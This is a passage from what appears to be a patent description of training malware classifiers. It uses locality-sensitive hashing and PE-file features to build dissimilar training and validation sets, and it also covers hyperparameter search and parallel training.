In some examples, the LSH process for a given training data stream **114** takes as input a vector of values, e.g., numerical values, associated with (e.g., of or determined based at least in part on) that training data stream **114**. The representation module **222** computes the dot products of the input vector with multiple weight vectors. The concatenated signs of the resulting dot products form a hash value for the input vector. This is an example of an LSH technique known as $E^2$LSH. The weight vectors can be determined, e.g., by selecting vector elements randomly (or pseudorandomly, and likewise throughout this document). Other LSH techniques, which can be used singly or in combination with other techniques, can include lattice LSH, spherical LSH, or other $\ell_p$-distance based LSH techniques; $E^2$LSH, kernel LSH, or other angle-based LSH techniques; Hamming-distance based LSH techniques; min-hash, K-min sketch, or other Jaccard-coefficient based LSH techniques; chi-squared-based LSH techniques; winner-take-all hashing; or shift-invariant kernel hashing.

In some examples, the LSH process for a giving training data stream **114** can including determining a "peHash" hash or pre-hash, or other hash determined based at least in part on, or including or representing, portions or characteristics of the training data stream **114** selected by a security analyst. The peHash algorithm determines a hash as a SHA-1 hash of a pre-hash (also referred to as a "hash buffer"). The pre-hash can include values determined from fields of a PE file's header and the file's section headers, including the file's flags, subsystem identifier, stack commit size, and heap commit size, and each section's virtual address, raw size, and section characteristics. The number of bits of each field used can be limited to, e.g., between eight and 32 to increase locality-sensitivity. This is not limiting, and other amounts of data can additionally or alternatively be used, e.g., >100 bytes, >200 bytes, 512 bytes, one kilobyte, or larger buffers. The pre-hash can additionally or alternatively include a binned compression ratio of each section indicating the entropy of that section. In some examples, the LSH signatures **404** or other signatures **304** can include at least one of

the above types of data of a pre-hash, or cryptographic hashes of pre-hashes including any of the above types of data.

In some examples, at operation **406**, the preparation module **224** determines the validation set **312** including validation streams **314** of the plurality of training data streams **114** that satisfy the predetermined difference criterion **316** with respect to training stream(s) **310** in the training set **308**. Examples are discussed herein, e.g., with reference to operation **306**. For example, the preparation module **224** can select at least some training stream(s) **310**, then select validation streams **314** that are distant from those training stream(s) **310** as measured by the predetermined difference criterion **316**. For clarity of explanation, without limitation, some examples herein are given for which an LSH hash code is an f-dimensional bit string.

In some examples, the predetermined difference criterion **316** can be satisfied between two training data streams **114** $\alpha$ and $\beta$ if any, or any combination, of the following hold. Throughout this paragraph and the next paragraph, examples of LSH has codes are used for brevity. However, techniques herein can additionally or alternatively be used for types of signatures **304** other than LSH hash codes. Criterion **316** can be satisfied, e.g., when: $\alpha$ and $\beta$ are in different LSH hash buckets (or bins); $\alpha$ and $\beta$ have respective, different LSH hash codes (or other signatures **304**) $\alpha_c$ and $\beta_c$; or $\alpha_c$ is in a hash bucket including only, or over 50%, training streams **310** and $\beta_c$ is in a hash bucket including only, or over 50%, validation streams **314** (e.g., for impure hash buckets).

In some examples, the predetermined difference criterion **316** can be satisfied if a, and $\beta_c$ are spaced apart from each other by at least a predetermined distance in an evaluation space or metric. Example evaluation spaces or metrics can include Euclidian, Manhattan, or other distances in an f-dimensional space; Hamming distance or Jaccard distance; or angle between the vectors $\alpha_c - \vec{0}$ and $\beta_c - \vec{0}$. In some examples, the predetermined difference criterion **316** can be satisfied if $\alpha_c$ and $\beta_c$ (or numeric representations thereof, such as length) fall in separate quantization bins, the level of quantization defined by the predetermined difference criterion **316**.

In some examples, at operation **408**, the training module **226** performs a supervised learning process to determine the CM **220**. The supervised learning process can use at least one training stream **310** of the training set **308** as training data. Examples are discussed herein, e.g., with reference to operation **318**. In other examples, an unsupervised learning process can additionally or alternatively be used. In some examples, each training stream **310** is associated with a classification **120**. The training module **226** can determine the CM **220** to output classifications **120**, e.g., with at least a predetermined level of accuracy, for the training streams **310**.

Some CMs are subject to overfitting, an effect by which the training increases the accuracy of the CM on the specific training data provided, at the expense of the model's ability to generalize or correctly process new samples. For example, consider a CM being trained to classify malware. There are various high-level categories of malware, such as spyware, adware, ransomware, and botnet software. Within each category, there may be numerous families of malware. For example, some families of ransomware lock the user interface of an infected computer, e.g., until a ransom is paid. Other families of ransomware encrypt files on an infected computer using an encryption key known only to the adversary. Still other families encrypt files on any



network drives connected to an infected computer. Some families may combine characteristics of multiple of these families, and adversaries continue to develop new families of ransomware and other malware. The widespread availability of high-speed Internet connections and powerful computers has increased the use of malware variants by unskilled adversaries as well as by sophisticated adversaries. Therefore, a CM that is trained and overfit to distinguish between specific families of ransomware may not correctly classify new families of ransomware, and may even fail to identify malware from such families as ransomware.

To reduce the probability of overfitting, the CM **220** can be tested using the validation set **312**. Even if the CM **220** is very accurate on the training set **308**, it may be necessary to retrain or adjust the CM **220** if it is not very accurate on the validation set **312**. In some examples, to permit determining accuracy during validation, each validation stream **314** is associated with a classification **120**.

In some examples, at operation **410**, the training module **226** (or the operation module **228**) tests the determined CM **220** based at least in part on at least one validation stream **314** of the validation set **312** (depicted using a dashed arrow). Operation **410** produces a trial result **412**. Examples are discussed herein, e.g., with reference to operation **320**. For example, the training module **226** can apply the at least one validation stream **314** to the CM **220** to determine a classification **120**. The classification **120**, or an indication of whether the classification **120** was accurate, can then be included in the trial result **412**.

In some examples, at operation **414**, the training module **226** selectively updates the CM **220** based at least in part on a result of the testing (operation **410**). For example, if the trial result **410** indicates that the accuracy of the CM **220** is consistent between the training set **308** and the validation set **312**, training can continue, and the training module **226** can update the parameters of the CM **220** as discussed herein with reference to operation **408**.

In some examples, operations **408-414** can be repeated as long as accuracy on the validation set **312** is improving as training proceeds, as indicated by the trial result **412**, and can terminate when accuracy on the validation set **312** ceases to improve as training proceeds. Using operations **408-414** can permit detecting overfitting, e.g., when accuracy on the validation set **312** ceases to improve. Avoiding overfitting using techniques of process **400** can permit determining CMs **220** that have a higher probability of determining the category of malware, even for malware families not represented in the training data streams **114** ("unseen samples"). Some examples herein can also improve the determination probability on unseen samples for CMs **220** configured to provide model outputs other than malware category, e.g., malware type, malware family, or adversary identity (individual or group).

Using ransomware as a nonlimiting example, even if the training data streams **114** do not include ransomware of the cookie-monster family, a CM **220** trained using process **400** or other example processes herein may nevertheless be able to identify a cookie-monster malware sample as being in the ransomware category. In some examples, such a CM **220** may also be able to identify, via a field in classification **120**, that the cookie-monster sample is not of a known family of ransomware. This can permit early detection of new families of ransomware or other malware, which can in turn permit mitigating deleterious effects of malware belonging to those new families more rapidly and effectively.

FIG. **5** is a dataflow diagram that illustrates an example process **500** for determining and operating CM(s), and

related dataflow. In some examples, operation **302** or operation **402** can include operation **502** or operation **510**. In some examples, operation **302** or operation **402** can include operation **508**.

In some examples, at operation **502**, the representation module **222** determines respective feature vectors **504** of the individual training data streams **114**. For example, representation module **222** can operate a feature extractor, such as a previously-trained CM or a hand-coded feature extractor, on bit(s) of a training data stream **114** to provide the feature vector **504**. In some examples, the feature extractor can determine additional features **506** that are not included in the feature vector **504**.

In some examples, the representation module **222** can determine at least one of the features listed in Table 2 with respect to a training data stream **114**. For brevity, the symbol Σ in the Table 2 refers to the training data stream **114** or portion(s) thereof as may be determined or processed by the representation module **222**. The listed features can be included in feature vector **504** or can be additional features **506**.

autoencoder can provide a number of float values, e.g., 20 float values, that are the outputs of a hidden layer, e.g., as discussed above. A feature in a feature vector **504** can then include or consist of those 20 float values (or other value(s) provided by the autoencoder), or a portion thereof.

In some examples, at operation **508**, the representation module **222** can select at least one additional feature **506** for inclusion in the feature vector **504**, as depicted by the dashed arrows. The representation module **222** can, e.g., add the at least one additional feature **506** to the feature vector **504** immediately. The representation module **222** can additionally or alternatively update stored information, e.g., in CRM **214**, so that the at least one additional feature **506** will be included in the feature vector **504** upon future performance of operation **502**.

In some examples, the representation module **222** can select the at least one additional feature **506** providing at least a predetermined number of bits of entropy, e.g., at least three bits or at least n bits, n≥3. This can permit expressing finer distinctions between data streams than can binary-valued features or other features providing only a small number of possible values.

TABLE 2

| Feature |
|---|
| Entropy of Σ |
| Entropy of a segment or other portion(s) of Σ, e.g., a TEXT or DATA segment |
| Entropy of a subset of Σ, e.g., of multiple sections |
| Character(s) or symbol(s), or hash(es) or other representation(s), of human-readable text ("printable strings") included in Σ |
| Number of printable strings in Σ |
| Flags or other values of standardized headers in Σ, e.g., the MZ or PE headers or the DLL import table of a WINDOWS executable file 122 |
| Flags or other values of other headers or structures in Σ, e.g., comp. id values found in the Rich header in a WINDOWS executable file 122 |
| Contents of Σ, e.g., ten (or another number of) bytes at the entry point or the beginning of main( ) in an executable file 122 |
| Output(s) of an autoencoder (as discussed below) when provided Σ as input, e.g., when provided bytes at the entry point |
| Size of Σ (e.g., in bytes) |
| SHA-256 or other cryptographic hash value(s) of at least portion(s) of Σ, e.g., of headers, individual sections, metadata, version information, or icons, text, fonts, audio, graphics, or other content assets embedded or included in Σ. |
| File type of Σ, e.g., as output by pefile, PEiD, TrID, or file(1) |

As noted in Table 2, one example feature is output(s) of an autoencoder. An autoencoder can include, e.g., a deep neural network, trained to produce output substantially equal to its input. Neural-network autoencoders generally include at least one hidden layer having fewer outputs than the number of inputs. As a result, the outputs of the hidden layer are a representation of the input, and that representation has lower dimensionality than the input itself. This reduction in dimensionality can provide information about the structure of the input or of a class of related inputs. In some examples, the autoencoder is a denoising autoencoder. The denoising autoencoder is trained to produce output substantially equal to a reference, when the training inputs to the neural network are portions of, or partly-corrupted versions of, the reference. The lower-dimensional hidden-layer outputs of a denoising autoencoder can provide information about the input that is robust to minor variations, such as may be introduced by adversaries to render their malware more difficult to detect.

In an example, an autoencoder can receive a one-hot or other encoding of a number of bytes of Σ, e.g., 2560 bits of input that are a one-hot encoding of ten bytes of Σ or a portion thereof. The bytes can include or consist of, e.g., bytes beginning with the byte at the entry point. The

In some examples, the representation module **222** can select the at least one additional feature **506** based at least in part on performance on a desired task of the CM. For example, a CM **220** configured to determine whether a trial data stream **116** is associated with malware can be evaluated based on a corpus of known samples to determine the accuracy of the CM **220**. If CM **220** meets a predetermined accuracy criterion, the CM **220** can be inspected to determine which inputs are significant contributors to the (sufficiently accurate) results provided by the CM **220**. For example, Garson's or Goh's algorithms can be used to determine, based on the weights of a neural network, which inputs of that neural network have the most significant role in determining a particular output of that neural network. The Lek profile method can determine the sensitivity of particular outputs of a neural network to changes in particular inputs of that neural network.

In some examples, e.g., using decision trees, ensembles, or forests, information gain algorithms can be used to determine changes in the mutual information of node(s) of tree(s) over the course of training, e.g., as in RANDOM FORESTS. Gradient-boosted tree-ensemble training can take into account leaf weights when determining the importance of an input to the output of the ensemble, e.g., as in

xgboost. Accordingly, the training module **226** can provide to the representation module **222** mutual-information data, leaf weights, or other values useful in determining relative effect on the outputs of various features. The representation module **222** can then select for inclusion the at least one additional feature **506** having, e.g., the most significant relative effect among the additional features **506**.

Accordingly, in some examples, the representation module **222** (or other modules herein) can include candidate feature(s) of the additional features **506** in a CM and train that CM until it meets the predetermined accuracy criterion. The representation module **222** can then use the above techniques to select as the at least one additional feature **506** at least one of the candidate feature(s) strongly associated with or otherwise significantly responsible for the accuracy of the trained CM.

In some examples, at operation **510**, the representation module **222** determines the signatures **304** based on the respective feature vectors **504**. For example, representation module **222** can determine the signatures **304** as the LSH values of the respective feature vectors **504**. Examples of LSH are discussed herein, e.g., with reference to operation **402**. Some examples in which locality-sensitive hashes of feature vectors **504** are used as representations of the respective data streams **114**, **116** can permit grouping training data streams **114** in semantically-meaningful ways with the use of considerably fewer computational resources than prior schemes such as exhaustive pairwise comparison. For example, hashing the training data streams **114** using LSH can permit readily determining similar training data streams **114** and avoiding dividing those similar training data streams **114** between the training set **308** and the validation set **312**. This can in turn reduce the risk of overfitting of CM **220**, as discussed above. In some examples of operation **306**, training data streams **114** allocated to a particular LSH bin are included entirely in the training set **308** or entirely in the validation set **312**, and are not allocated some to the training set **308** and some to the validation set **312**.

In some examples, the representation module **222** can determine LSH hash values using angular-distance (dot product)-based LSH. Such a hash value, in some examples, is a concatenation of n bits $b_n$. Each bit $b_n$ is determined from a respective one of n integer or float values $v_n$, e.g., by thresholding $v_n$. For example, $b_n$ can be 1 if $v_n \geq 0$ and 0 otherwise. Each value $v_n$ can be a dot product of a signature vector S, e.g., a signature **304** such as a feature vector **504**, with a respective weight vector $W_n$.

In some examples, the representation module **222** can determine LSH hash values using sparse LSH techniques. In some examples, e.g., using the notation of the previous paragraph, the representation module **222** can compute the bits $b_n$ based on respective modified values $m_n$. Each modified value $m_n$ can be computed using a dot product, but with a modified weight vector $U_n$ (e.g., a "sparse LSH weight vector") instead of with weight vector $V_n$. Each modified weight vector $U_n$ can be determined by copying $W_n$ to form $U_n$, then randomly modifying elements of $U_n$ with a probability of modification p. For example, the $i^{th}$ element of $U_n$ can be set to zero, unity, or another predetermined value if $d_i < p$ for a respective random draw $d_i$ from a uniform distribution on the range [0,1].

Using sparse LSH techniques can provide benefits similar to the benefits of denoising autoencoders. For example, using sparse LSH techniques can reduce the likelihood that a CM **220** will overfit to particular features to the exclusion of other features. Using sparse LSH techniques can therefore improve the ability of CM **220** to generalize to trial data streams **116** different from the training data streams **114** used in determining the CM. Accordingly, in some examples, operation **510** can include determining sparse LSH weight vectors $U_n$ and determining the signatures **304** as the LSH values of the respective feature vectors **504** based at least in part on the sparse LSH weight vectors $U_n$.



In other examples, as depicted by the stippled arrow, the signatures **304** can include or consist of the respective feature vectors **504** or subsets thereof. For example, the predetermined difference criterion **316** can specify a threshold distance above which two feature vectors **504** or respective subsets thereof will be considered distinct. Such a threshold distance can be a Euclidean, Hamming, angular, or other distance described herein.

FIG. **6** is a dataflow diagram that illustrates an example process **600** for determining and operating computational model(s), and related dataflow. Process **600** can be carried out, e.g., under control of at least one processing unit **210**. Process **600** can take as input data streams **602**, e.g., of a plurality of data streams. Data streams **602** can represent training data streams **114**, FIG. **1**.

In some examples, at operation **604**, the representation module **222** determines signatures **606** of respective data streams **602**. Examples are discussed herein, e.g., with reference to at least one of operation **302** or FIG. **4**, **5**, or **7**.

In some examples, at operation **608**, the preparation module **224** determines, based at least in part on the signatures **606**, a training set **610** comprising at least one data stream **612** of the data streams **602** and a validation set **614** comprising at least one data stream **616** of the data streams **602**. Examples are discussed herein, e.g., with reference to operation **306**. In some examples, the preparation module **224** determines the training set **610** and the validation set **614** so that the training set is disjoint from the validation set, e.g., as discussed above.

In some examples, the respective signatures **606** of a data stream **612** of the training set **610** and a data stream **616** of the validation set **614** satisfy a predetermined difference criterion **618**. In some examples, the validation set **614** includes at least some elements different from the training set **610**. For example, the preparation module **224** can determine the validation set **614** including individual data streams **616** that satisfy the predetermined difference criterion **618** with respect to at least some of the data streams **612** in the training set **610**. Examples are discussed herein, e.g., with reference to predetermined difference criterion **316**.

In some examples, at operation **620**, the training module **226** determines a computational model (CM) **622**, e.g., including a neural network, decision tree, or tree ensemble, based at least in part on the training set **610**. Examples are discussed herein, e.g., with reference to operation **318**.

In some examples, operation **620** can include, before determining the CM **622**, arranging the training set **610** and the validation set **614** in respective, different regions of a computer memory **212** communicatively connected with the processing unit(s) **210**. This can improve the locality of data streams **602** during the determination of the CM **622**, which can reduce cache misses and therefore improve the speed of power efficiency of the model determination (operation **620**).

FIG. **7** is a dataflow diagram that illustrates an example process **700** for determining CM(s), and related dataflow. In some examples, operation **604** can include operations **702** and **708**. In some examples, operation **604** can include operations **714** and **718**.

In some examples, at operation **702**, the representation module **222** determines the signatures **606** comprising

respective dissimilarity values **704** between the respective data streams **602** and a common reference data stream **706** of the data streams **602**. The reference data stream **706** can be selected, e.g., randomly, based on selection by entity **110**, or (e.g., for full intercomparison of each possible pair of data streams **602**) as the next data stream **602**, when the data streams **602** are taken in turn as common reference data streams **706**. Operation **702** can include, e.g., one-to-many pairwise comparisons of the data streams **602** to determine the signatures **606**, based on which the training set **610** and the validation set **614** can be determined as discussed herein with reference to operation **608**.

In some examples, an individual dissimilarity value **704** can include at least one of: a Hamming distance between at least part of the respective data stream **602** and at least part of the reference data stream **706**; a dot product or other angular distance, a Euclidean distance, or another distance measure between a first vector including at least some bits of the respective data stream **602** and a second vector including at least some bits from the reference data stream **706**; a comparison between a value in the respective data stream **602** and a corresponding value in the reference data stream **706** such as a difference between two float values; a true/false indication of whether the data stream **602** and the reference data stream **706** differ, or any of the above measures with respect to respective hashes (e.g., SHA-256, $E^2$LSH, ssdeep, peHash, or other hashes described herein) or other representations of at least a portion of the respective data stream **602** and at least a portion of the reference data stream **706**.

In some examples, at operation **708**, the representation module **222** determines the signatures **606** further comprising respective dissimilarity values **710** between the respective data streams **602** and a common second reference data stream **712** of the data streams **602**. The common second reference data stream **712** can be different from the common reference data stream **706**. The common second reference data stream **712** can be determined as described herein with reference to the reference data stream **706**. For example, each data stream **602** in turn can be selected to be the common second reference data stream **712**. Examples of dissimilarity values are discussed herein, e.g., with reference to operation **702**.

In some examples, operation **708** can include determining any number of values of or in signatures **606**, e.g., based on respective pairwise comparisons of data streams **602**, e.g., up to the N(N−1)/2 such possible pairs that can be made from a set of N data streams **602**. Operation **708** can therefore include or permit, e.g., performing many-to-many pairwise comparisons of the data streams **602** to determine the signatures **606**. In some examples, signatures **606** can be columns (or rows) of a dissimilarity matrix, or other vectors, e.g., sparse or dense vectors, showing the results of the pairwise comparisons.

In some examples, at operation **714**, the representation module **222** determines respective feature vectors **716** of at least some of the data streams **602**. Examples are discussed herein, e.g., with reference to operations **402** and **502**.

In some examples, at operation **718**, the representation module **222** determines the signatures **606** comprising locality-sensitive hash (LSH) values **720** of the respective feature vectors **716**. Examples are discussed herein, e.g., with reference to operations **402** and **510**. In some examples using sparse LSH techniques, operation **718** can include determining sparse LSH weight vectors and determining the signatures **606** as the LSH values **720** of the respective feature vectors **716** based at least in part on the sparse LSH weight vectors. Examples are discussed herein, e.g., with reference to operation **510**.

FIG. **8** is a dataflow diagram that illustrates an example process **800** for determining and operating CM(s), and related dataflow. In some examples, operation **620** can include operations **802**, **808**, **812**, or **814**. Process **800** can include successively determining two CMs **804** and **816**, each of which can represent CM **622**. For example, process **800** can be used as part of an iterative training technique to determine CM **622**. Each CM **804**, **816** can be determined based at least in part on respective, different hyperparameter values, as described below. This can provide improved performance of CM **622**, as described herein, compared to some prior training techniques using only one hyperparameter value or value set for training.

In some examples, at operation **802**, the training module **226** determines a CM **804**, which can represent CM **622**, further based at least in part on a first hyperparameter value **806**. Examples of training are discussed herein, e.g., with reference to operation **620**. Examples of hyperparameters are discussed herein, e.g., with reference to training module **226**. For example, the first hyperparameter value **806** can include a learning rate or momentum. In some examples, the first hyperparameter value **806** can include a tuple or other collection, e.g., of float values, or other scalar or compound value(s).

In some examples, at operation **808**, the training module **226** (or the operation module **228**, and likewise throughout the following operations of process **800**) operates the CM **622** based at least in part on at least some of the data streams **616** of the validation set **614** to provide respective model outputs **810**.

In some examples, at operation **812**, the training module **226** determines that the model outputs **810** do not satisfy a predetermined completion criterion (or, equivalently, do satisfy a predetermined continuation criterion). Examples are discussed herein, e.g., with reference to operation **410**. In response to the determination at operation **812**, the training module **226** can perform operation **814**.

In some examples, at operation **814**, the training module **226** determines a second CM **816** based at least in part on the training set **610** and a second hyperparameter value **818**, e.g., a float value or tuple, different from the first hyperparameter value **806**. In some examples in which the first hyperparameter value **806** and the second hyperparameter value **818** are tuples, the first hyperparameter value **806** and the second hyperparameter value **818** can differ in at least one corresponding element. The second CM **816** can represent CM **622**. The second CM **816** can be determined as discussed herein with reference to, e.g., operation **802**, operation **620**, or operation **318**. In some examples, the training module **226** can determine the second hyperparameter value **818** based at least in part on the first hyperparameter value **806**. In some examples, the training module **226** can determine the second hyperparameter value **818** based at least in part on at least one of the model outputs.

In some examples, depicted by the dashed arrow, operation **814** can be followed by operation **808** to determine model outputs **810** of the second CM **816**. Process **800** can include iterating, e.g., using a mathematical optimization technique, to determine hyperparameter value(s) that will provide a CM **622** whose outputs (e.g., accuracy of malware identification) satisfy the predetermined completion criterion. Any of the mathematical optimization techniques described herein can be used in determining the second hyperparameter value **818** or subsequent hyperparameter

values, e.g., techniques such as gradient descent. Additionally or alternatively, techniques such as grid search or other searching techniques can be used to explore the hyperparameter space to determine hyperparameter values. In some examples, using mathematical techniques to traverse the hyperparameter space can provide a classifier, e.g., a malware/non-malware classifier, that performs effectively or that most effectively generalizes to new malware families or other data beyond the training set **610**.

FIG. **9** is a dataflow diagram that illustrates an example process **900** for determining and operating CM(s), and related dataflow. In some examples, operation **620** can include operations of process **900**. In some example of process **900** and in other examples, neural-network training or other computational-model determination can be performed by multiple nodes in a parallel manner to reduce the time required for training.

In some examples, at operation **902**, the training module **226** (or the preparation module **224** or the operation module **228**, and likewise throughout the following discussion of process **900**) determines a plurality of partitions **904** of the training set **610** based at least in part on the signatures **606**. Each partition **904** of the plurality of partitions **904** comprises at least one of the data streams **612** of the training set **610**. The illustrated partitions **904** are a second partition **906** and a $J^{th}$ partition **908**, discussed below with reference to nodes **912**.

In some examples, at operation **910**, the training module **226** provides individual partitions **904** of the plurality of partitions **904** to respective computing nodes **912** of a plurality of computing nodes **912**(**1**)-**912**(J) (shown in phantom) (individually and/or collectively referred to herein with reference **912**), where J is any integer greater than and/or equal to 1, via a communications interface **232**. The training module **226** can provide the partitions **904**, e.g., by transmitting data of at least some of the individual partitions **904** to the respective computing nodes **912** via, e.g., a memory or network interface communicatively connected with the processing unit(s) **210** (e.g., a processor). This can permit the computing nodes **912** to process the respective partitions **904** in parallel, which can reduce the amount of time required to determine the CM **622**. In the illustrated example, as depicted by the dotted lines and dash-dot indicator, the training module **226** provides the second partition **906** to node **912**(**2**) and the $J^{th}$ partition **908** to node **912**(J).

In some examples, operation **910** can be performed more than once, as depicted by the dashed arrow and discussed below. In some of these examples, the second and subsequent performance of operation **910** can include transmitting a command to at least one node **912** to begin processing using data previously transmitted. For example, the nodes **912** can retain local copies of their respective partitions **904** and perform computations repeatedly on those copies.

In some examples of a multiple-node computational-model-determining system (e.g., having separate memory banks per node), the training set **610** can be divided into the partitions **904** based at least in part on the signatures **606** to determine CMs **622** to achieve specific objectives. In some examples, each partition **904** can include or consist of similar files (or other data streams, and likewise throughout this paragraph) to permit each node to train on specific traits. In some examples, each partition **904** can include a diverse set of data streams (e.g., having respective, different signatures) so that each node contributes to determining a CM **622** in view of the context provided by the whole training set **610** or a broad subset thereof.

In some examples, each partition **904** (or at least some of the partitions **904**, and likewise throughout the discussion of operation **910**) can include or consist of similar data streams **612**. This can permit the respective nodes **912** to train on specific traits that are effectively reflected in the training set **610**. In some of these examples, at operation **910**, the training module **226** can determine a first partition, e.g., partition **906** (or some, or all partitions) of the plurality of partitions **904** based at least in part on a predetermined similarity criterion **914**. In some examples, the respective signatures **606** of a majority of the data streams in the first partition satisfy the predetermined similarity criterion **914** with respect to each other. Similarity comparisons can be made between data streams **612** or signatures **606**. Similarity comparisons can include pairwise comparisons, hashing and hash-bin comparisons, or other comparisons.

In some examples, each partition **904** can include or consist of a diverse set of data streams **612**, e.g., data streams **612** having signatures that differ from each other. This can permit more improving model training speed while retaining understood behavior, e.g., of minibatch-based training techniques. In some of these examples, at operation **910**, the training module **226** can determine a first partition, e.g., partition **906** of the plurality of partitions **904** based at least in part on the predetermined similarity criterion **914**. In some examples, for any majority of the data streams **612** in the first partition, the respective signatures **606** of the data streams **612** in that majority do not satisfy the predetermined similarity criterion **914** with respect to each other, as determined using pairwise comparisons, hashes, or other comparison techniques described herein. In some examples, no partition **904** has more than 50% data streams **612** that are grouped together by the predetermined similarity criterion **914**.

In some examples, at operation **916**, the training module **226** receives, e.g., via communications interface **232**, respective results **918** from individual computing nodes **912** of the plurality of computing nodes **912**. For example, the results can include at least one of: a parameter value, a parameter-gradient value, e.g., with respect to a loss, cost, or value function; or an output of part or all of the CM for a specific input. In some examples using gradient descent to train neural networks, the results **918** from each respective node **912** can include gradients determined based on the respective partitions **904**.

In some examples, at operation **920**, the training module **226** determines the CM **622** based at least in part on the results **918**. For example, the training module **226** can determine an overall gradient, e.g., as an average or other combination of gradients included in the results **918**, and then can update parameter values of the CM **622** based on the overall gradient, e.g., using backpropagation.

In some examples, as depicted by the dashed arrows, operation **920** can be followed by operation **902** or operation **910**. These examples can permit iteratively updating CM **622**, e.g., during a mathematical-optimization training process.

In some examples, neural networks are trained using minibatch-based stochastic gradient descent (SGD) techniques. SGD can be parallelized along three dimensions: model parallelism, layer parallelism, and data parallelism (and combinations thereof). In model parallelism, each node computes only some parameters of the model, and nodes intercommunicate to exchange parameters. In layer parallelism, each node receives inputs, computes parameters for a particular layer, and provides outputs of that layer to another node. In data parallelism, each node trains a full CM

on respective, different data, and the parameter updates (e.g., gradients) are merged to determine how to update the model. Some examples of process **900** provide data-parallel training to determine CM **622**.

FIG. **10** is a dataflow diagram that illustrates an example process **1000** for determining and operating computational model(s), and related dataflow. Process **1000** can be carried out, e.g., under control of at least one processing unit **210**. Process **1000** can take as input a training set **1002** including data streams **1004** and a candidate set **1006** including data streams **1008**. Data streams **1004** and **1008** can represent training data streams **114**, FIG. **1**.

In some examples, at operation **1010**, the preparation module **224** determines a validation set **1012** of data streams **1014** from the candidate set **1006** of data streams **1008** based at least in part on the training set **1002** of data streams **1004** and on a predetermined difference criterion **1016** between data streams. Examples are discussed herein, e.g., with reference to operations **306**, **406**, or **608**, or predetermined difference criterion **316**. In some examples, the preparation module **224** can select for inclusion in the validation set **1012** data streams **1008** that satisfy the predetermined difference criterion **1016** with respect to at least one, some, a majority of, or all of the data streams **1004** of the training set **1002**. The training set **1002** can be a subset of the candidate set **1006**, or can be disjoint from the candidate set **1006**, in some examples. In some examples, the training set **1002** and the determined validation set **1012** can be disjoint, although this is not required. In some examples, the training set **1002** comprises or consists of at least some, but fewer than all, of the data streams **1008** of the candidate set **1008**.

In some examples, operation **1010** can include determining LSH values, performing other hash-based similarity analysis, or comparing malware family names derived using conventional anti-virus signatures, e.g., as discussed herein with reference to FIG. **4** or **5**. In some examples, operation **1010** can include one-to-many or many-to-many sets of pairwise comparisons to determine similarity. In some examples, whether hashing or pairwise comparisons, data streams **1008** are not selected for inclusion in the validation set **1012** if they are similar to data streams **1004** of the training set **1002**.

In some examples, at operation **1018**, the training module **226** (or the operation module **228**, and likewise throughout the following operations of process **800**) can operate a computational model (CM) **1020**, which can represent CM **220**, based at least in part on data stream(s) **1014** of the validation set **1012** to provide respective model output(s) **1022**. Examples are discussed herein, e.g., with reference to operations **320** or **808**.

In some examples, at operation **1024**, the training module **226** determines that the model output(s) **1022** do not satisfy a predetermined completion criterion **1026**. Examples are discussed herein, e.g., with reference to operations **410** and **812**. In response, operation **1024** can be followed by operation **1028**.

In some examples, at operation **1028**, the training module **226** updates the CM **1020** based at least in part on data stream(s) **1004** of the training set **1002**. For example, the training module **226** can run the next training epoch in a sequence of epochs, or can perform training with different hyperparameter values, as described herein. Examples are discussed herein, e.g., with reference to operations **414** and **814**. In some examples, operation **1028** can be followed by operation **1018**. This can permit iteratively training the CM **1020**, e.g., using mathematical-optimization techniques.



In some examples, operation **1028** can include, before updating the CM **1020**, packing the training set **1002** of data streams **1004** in a processor-accessible memory **212**. Packing can include any data rearrangement to increase locality, e.g., defragmenting the data streams **1004** in memory, arranging them on successive cache lines for improved prefetch, or other techniques. Locality can also be increased in the CM **1020**, which can speed operation of the CM **1020**. In some examples, e.g., using hashing (e.g., LSH) or other signatures, a decision-forest CM **1020** can be determined so that each decision tree in the forest is associated with a bin of signatures (e.g., of hash codes thereof). This can permit operating the decision forest using parameters having increased locality for any particular trial data stream **116**. This can additionally or alternatively permit loading into memory fewer than all of the parameters of the decision forest by only loading parameters relevant to a particular trial data stream **116**, which can increase data-cache locality of the parameters and speed operation of the CM **1020**. Techniques in this paragraph and similar techniques can additionally or alternatively permit reducing the memory bandwidth or network bandwidth used during training of the CM **1020**.

FIG. **11** is a dataflow diagram that illustrates an example process **1100** for determining and operating CM(s), and related dataflow. In some examples, operation **1010** can include operations **1102**, **1112**, and **1116**. In some examples, process **1100** can include determining the training set **1002** and the validation set **1012** in a coordinated manner, e.g., as discussed below with reference to operation **1118**.

In some examples, the predetermined difference criterion **1016** applies to at least two signatures and is satisfied by the at least two signatures having at least a predetermined threshold difference. The predetermined threshold difference can be inequality, a difference in magnitude of at least (or exceeding) a threshold, a Hamming distance or other distance measure of at least (or exceeding) a threshold, or another difference threshold.

In some examples, at operation **1102**, the preparation module **224** determines respective signatures **1104**, which can represent signatures **304**, of at least some data streams **1008** of the candidate set **1006**. Examples are discussed herein, e.g., with reference to operations **402**, **604**, or **902**. Operation **1102** can be followed by operation **1112** or operation **1118**. In some examples, operation **1102** includes operations **1106** and **1110**.

In some examples, at operation **1106**, the preparation module **224** determines a feature vector **1108** associated with a first data stream **1008** of the candidate set **1006**. Examples are discussed herein, e.g., with reference to operation **502** or feature vectors **504**.

In some examples, at operation **1110**, the preparation module **224** determines the respective signature **1104** of the first data stream **1008** as a locality-sensitive hash (LSH) of the feature vector **1108**. Examples are discussed herein, e.g., with reference to operations **402** or **510** or signatures **304**. In some examples using sparse LSH techniques, operation **1110** can include determining sparse LSH weight vectors and determining the respective signature **1104** of the first data stream as a locality-sensitive hash (LSH) of the feature vector **1108** based at least in part on the sparse LSH weight vectors. Examples are discussed herein, e.g., with reference to operation **510**.

In some examples, at operation **1112**, the preparation module **224** determines respective signatures **1114**, which can represent signatures **304**, of at least some data streams **1004** of the training set **1002**. Examples are discussed

herein, e.g., with reference to operations **402**, **604**, or **902**. For example, signatures **1114** can be determined as discussed herein with reference to signatures **1104**.

In some examples, at operation **1116**, the preparation module **224** selects a first data stream **1008** (or at least one data stream) of the candidate set **1006** for inclusion in the validation set **1012** in response to the respective signature **1104** of the first data stream **1008** satisfying the predetermined difference criterion **1016** with respect to the respective signature **1114** of at least one data stream **1004** of the training set **1002**. Examples are discussed herein, e.g., with reference to FIG. **4**. For example, the first data stream **1008** can be selected further based at least in part on the first data stream **1008** satisfying the predetermined difference criterion **1016** with respect to a majority of, or all of, or at least a predetermined number or percentage of, the respective signatures **1114** of the data streams **1004** of the training set **1002**.

